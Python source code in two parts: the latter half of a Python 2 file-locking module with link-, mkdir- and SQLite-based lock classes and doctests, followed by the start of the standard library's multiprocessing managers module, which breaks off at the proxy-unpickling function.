>>> e1, e2 = threading.Event(), threading.Event()
>>> t = _in_thread(_lock_wait_unlock, e1, e2)
>>> e1.wait() # wait for thread t to acquire filelock
>>> lock2 = FileLock(_testfile())
>>> lock2.is_locked()
True
>>> try:
... lock2.acquire(timeout=0.1)
... except LockTimeout:
... pass
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... lock2.release()
... print 'thread', threading.currentThread().getName(),
... print 'erroneously locked an already locked file.'
...
>>> e2.set()
>>> t.join()
"""
pass
def release(self):
"""
Release the lock.
If the file is not locked, raise NotLocked.
>>> lock = FileLock(_testfile())
>>> lock.acquire()
>>> lock.release()
>>> lock.is_locked()
False
>>> lock.i_am_locking()
False
>>> try:
... lock.release()
... except NotLocked:
... pass
... except NotMyLock:
... print 'unexpected exception', NotMyLock
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... print 'erroneously unlocked file'
>>> e1, e2 = threading.Event(), threading.Event()
>>> t = _in_thread(_lock_wait_unlock, e1, e2)
>>> e1.wait()
>>> lock2 = FileLock(_testfile())
>>> lock2.is_locked()
True
>>> lock2.i_am_locking()
False
>>> try:
... lock2.release()
... except NotMyLock:
... pass
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... print 'erroneously unlocked a file locked by another thread.'
...
>>> e2.set()
>>> t.join()
"""
pass
def is_locked(self):
"""
Tell whether or not the file is locked.
>>> lock = FileLock(_testfile())
>>> lock.acquire()
>>> lock.is_locked()
True
>>> lock.release()
>>> lock.is_locked()
False
"""
pass
def i_am_locking(self):
"""Return True if this object is locking the file.
>>> lock1 = FileLock(_testfile(), threaded=False)
>>> lock1.acquire()
>>> lock2 = FileLock(_testfile())
>>> lock1.i_am_locking()
True
>>> lock2.i_am_locking()
False
>>> try:
... lock2.acquire(timeout=2)
... except LockTimeout:
... lock2.break_lock()
... lock2.is_locked()
... lock1.is_locked()
... lock2.acquire()
... else:
... print 'expected LockTimeout...'
...
False
False
>>> lock1.i_am_locking()
False
>>> lock2.i_am_locking()
True
>>> lock2.release()
"""
pass
def break_lock(self):
"""Remove a lock. Useful if a locking thread failed to unlock.
>>> lock = FileLock(_testfile())
>>> lock.acquire()
>>> lock2 = FileLock(_testfile())
>>> lock2.is_locked()
True
>>> lock2.break_lock()
>>> lock2.is_locked()
False
>>> try:
... lock.release()
... except NotLocked:
... pass
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... print 'break lock failed'
"""
pass
def __enter__(self):
"""Context manager support.
>>> lock = FileLock(_testfile())
>>> with lock:
... lock.is_locked()
...
True
>>> lock.is_locked()
False
"""
self.acquire()
return self
def __exit__(self, *_exc):
"""Context manager support.
>>> 'tested in __enter__'
'tested in __enter__'
"""
self.release()
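# Concrete subclasses override acquire(), release(), is_locked(),
# i_am_locking() and break_lock(); LockBase itself only supplies the lock-file
# naming scheme and the context-manager protocol.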
class LinkFileLock(LockBase):
"""Lock access to a file using atomic property of link(2)."""
def acquire(self, timeout=None):
"""
>>> d = _testfile()
>>> os.mkdir(d)
>>> os.chmod(d, 0444)
>>> try:
... lock = LinkFileLock(os.path.join(d, 'test'))
... try:
... lock.acquire()
... except LockFailed:
... pass
... else:
... lock.release()
... print 'erroneously locked', os.path.join(d, 'test')
... finally:
... os.chmod(d, 0664)
... os.rmdir(d)
"""
try:
open(self.unique_name, "wb").close()
except IOError:
raise LockFailed
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
while True:
# Try and create a hard link to it.
try:
os.link(self.unique_name, self.lock_file)
except OSError:
# Link creation failed. Maybe we've double-locked?
nlinks = os.stat(self.unique_name).st_nlink
if nlinks == 2:
# The original link plus the one I created == 2. We're
# good to go.
return
else:
# Otherwise the lock creation failed.
if timeout is not None and time.time() > end_time:
os.unlink(self.unique_name)
if timeout > 0:
raise LockTimeout
else:
raise AlreadyLocked
time.sleep(timeout is not None and timeout/10 or 0.1)
else:
# Link creation succeeded. We're good to go.
return
def release(self):
if not self.is_locked():
raise NotLocked
elif not os.path.exists(self.unique_name):
raise NotMyLock
os.unlink(self.unique_name)
os.unlink(self.lock_file)
def is_locked(self):
return os.path.exists(self.lock_file)
def i_am_locking(self):
return (self.is_locked() and
os.path.exists(self.unique_name) and
os.stat(self.unique_name).st_nlink == 2)
def break_lock(self):
if os.path.exists(self.lock_file):
os.unlink(self.lock_file)
class MkdirFileLock(LockBase):
"""Lock file by creating a directory."""
def __init__(self, path, threaded=True):
"""
>>> lock = MkdirFileLock(_testfile())
"""
LockBase.__init__(self, path)
if threaded:
tname = "%x-" % thread.get_ident()
else:
tname = ""
# Lock file itself is a directory. Place the unique file name into
# it.
self.unique_name = os.path.join(self.lock_file,
"%s.%s%s" % (self.hostname,
tname,
self.pid))
def acquire(self, timeout=None):
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
if timeout is None:
wait = 0.1
else:
wait = max(0, timeout / 10)
while True:
try:
os.mkdir(self.lock_file)
except OSError, err:
if err.errno == errno.EEXIST:
# Already locked.
if os.path.exists(self.unique_name):
# Already locked by me.
return
if timeout is not None and time.time() > end_time:
if timeout > 0:
raise LockTimeout
else:
# Someone else has the lock.
raise AlreadyLocked
time.sleep(wait)
else:
# Couldn't create the lock for some other reason
raise LockFailed
else:
open(self.unique_name, "wb").close()
return
def release(self):
if not self.is_locked():
raise NotLocked
elif not os.path.exists(self.unique_name):
raise NotMyLock
os.unlink(self.unique_name)
os.rmdir(self.lock_file)
def is_locked(self):
return os.path.exists(self.lock_file)
def i_am_locking(self):
return (self.is_locked() and
os.path.exists(self.unique_name))
def break_lock(self):
if os.path.exists(self.lock_file):
for name in os.listdir(self.lock_file):
os.unlink(os.path.join(self.lock_file, name))
os.rmdir(self.lock_file)
class SQLiteFileLock(LockBase):
"Demonstration of using same SQL-based locking."
import tempfile
_fd, testdb = tempfile.mkstemp()
os.close(_fd)
os.unlink(testdb)
del _fd, tempfile
def __init__(self, path, threaded=True):
LockBase.__init__(self, path, threaded)
self.lock_file = unicode(self.lock_file)
self.unique_name = unicode(self.unique_name)
import sqlite3
self.connection = sqlite3.connect(SQLiteFileLock.testdb)
c = self.connection.cursor()
try:
c.execute("create table locks"
"("
" lock_file varchar(32),"
" unique_name varchar(32)"
")")
except sqlite3.OperationalError:
pass
else:
self.connection.commit()
import atexit
atexit.register(os.unlink, SQLiteFileLock.testdb)
def acquire(self, timeout=None):
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
if timeout is None:
wait = 0.1
elif timeout <= 0:
wait = 0
else:
wait = timeout / 10
cursor = self.connection.cursor()
while True:
if not self.is_locked():
# Not locked. Try to lock it.
cursor.execute("insert into locks"
" (lock_file, unique_name)"
" values"
" (?, ?)",
(self.lock_file, self.unique_name))
self.connection.commit()
# Check to see if we are the only lock holder.
cursor.execute("select * from locks"
" where unique_name = ?",
(self.unique_name,))
rows = cursor.fetchall()
if len(rows) > 1:
# Nope. Someone else got there. Remove our lock.
cursor.execute("delete from locks"
" where unique_name = ?",
(self.unique_name,))
self.connection.commit()
else:
# Yup. We're done, so go home.
return
else:
# Check to see if we are the only lock holder.
cursor.execute("select * from locks"
" where unique_name = ?",
(self.unique_name,))
rows = cursor.fetchall()
if len(rows) == 1:
# We're the locker, so go home.
return
# Maybe we should wait a bit longer.
if timeout is not None and time.time() > end_time:
if timeout > 0:
# No more waiting.
raise LockTimeout
else:
# Someone else has the lock and we are impatient..
raise AlreadyLocked
# Well, okay. We'll give it a bit longer.
time.sleep(wait)
def release(self):
if not self.is_locked():
raise NotLocked
if not self.i_am_locking():
raise NotMyLock, ("locker:", self._who_is_locking(),
"me:", self.unique_name)
cursor = self.connection.cursor()
cursor.execute("delete from locks"
" where unique_name = ?",
(self.unique_name,))
self.connection.commit()
def _who_is_locking(self):
cursor = self.connection.cursor()
cursor.execute("select unique_name from locks"
" where lock_file = ?",
(self.lock_file,))
return cursor.fetchone()[0]
def is_locked(self):
cursor = self.connection.cursor()
cursor.execute("select * from locks"
" where lock_file = ?",
(self.lock_file,))
rows = cursor.fetchall()
return not not rows
def i_am_locking(self):
cursor = self.connection.cursor()
cursor.execute("select * from locks"
" where lock_file = ?"
" and unique_name = ?",
(self.lock_file, self.unique_name))
return not not cursor.fetchall()
def break_lock(self):
cursor = self.connection.cursor()
cursor.execute("delete from locks"
" where lock_file = ?",
(self.lock_file,))
self.connection.commit()
if hasattr(os, "link"):
FileLock = LinkFileLock
else:
FileLock = MkdirFileLock
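# Both backends rely on an atomic filesystem operation -- link(2) for
# LinkFileLock, mkdir(2) for MkdirFileLock -- so the appearance of the lock
# artifact on disk is what constitutes holding the lock.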
def _in_thread(func, *args, **kwargs):
"""Execute func(*args, **kwargs) after dt seconds.
Helper for docttests.
"""
def _f():
func(*args, **kwargs)
t = threading.Thread(target=_f, name='/*/*')
t.start()
return t
def _testfile():
"""Return platform-appropriate lock file name.
Helper for doctests.
"""
import tempfile
return os.path.join(tempfile.gettempdir(), 'trash-%s' % os.getpid())
def _lock_wait_unlock(event1, event2):
"""Lock from another thread.
Helper for doctests.
"""
lock = FileLock(_testfile())
with lock:
event1.set() # we're in,
event2.wait() # wait for boss's permission to leave
def _test():
global FileLock
import doctest
import sys
def test_object(c):
nfailed = ntests = 0
for (obj, recurse) in ((c, True),
(LockBase, True),
(sys.modules["__main__"], False)):
tests = doctest.DocTestFinder(recurse=recurse).find(obj)
runner = doctest.DocTestRunner(verbose="-v" in sys.argv)
tests.sort(key = lambda test: test.name)
for test in tests:
f, t = runner.run(test)
nfailed += f
ntests += t
print FileLock.__name__, "tests:", ntests, "failed:", nfailed
return nfailed, ntests
nfailed = ntests = 0
if hasattr(os, "link"):
FileLock = LinkFileLock
f, t = test_object(FileLock)
nfailed += f
ntests += t
if hasattr(os, "mkdir"):
FileLock = MkdirFileLock
f, t = test_object(FileLock)
nfailed += f
ntests += t
try:
import sqlite3
except ImportError:
print "SQLite3 is unavailable - not testing SQLiteFileLock."
else:
print "Testing SQLiteFileLock with sqlite", sqlite3.sqlite_version,
print "& pysqlite", sqlite3.version
FileLock = SQLiteFileLock
f, t = test_object(FileLock)
nfailed += f
ntests += t
print "total tests:", ntests, "total failed:", nfailed
if __name__ == "__main__":
_test()
|
managers.py
|
#
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]
#
# Imports
#
import sys
import threading
import signal
import array
import queue
import time
import types
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
except ImportError:
HAS_SHMEM = False
else:
HAS_SHMEM = True
__all__.append('SharedMemoryManager')
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
del view_type, view_types
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
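# For example, public_methods([]) contains 'append', 'pop', 'sort', ... but
# none of the '__len__'-style dunder methods.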
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def _handle_request(self, c):
request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
def handle_request(self, conn):
'''
Handle a new connection
'''
try:
self._handle_request(conn)
except SystemExit:
# Server.serve_client() calls sys.exit(0) on EOF
pass
finally:
conn.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, /, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None, *, shutdown_timeout=1.0):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
self._shutdown_timeout = shutdown_timeout
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey, self._state,
self._Client, self._shutdown_timeout),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
        Return some info about the server's shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client,
shutdown_timeout):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=shutdown_timeout)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=shutdown_timeout)
if process.is_alive():
util.info('manager still alive after terminate')
process.kill()
process.join()
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
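# Registration sketch with hypothetical names: a subclass exposes the
# registered typeid as a factory method returning a proxy.
#
#   class MyManager(BaseManager):
#       pass
#   MyManager.register('Counter', collections.Counter)
#   with MyManager() as manager:
#       counter = manager.Counter('gallahad')   # AutoProxy to a server-side Counter
#       counter.update('spam')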
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
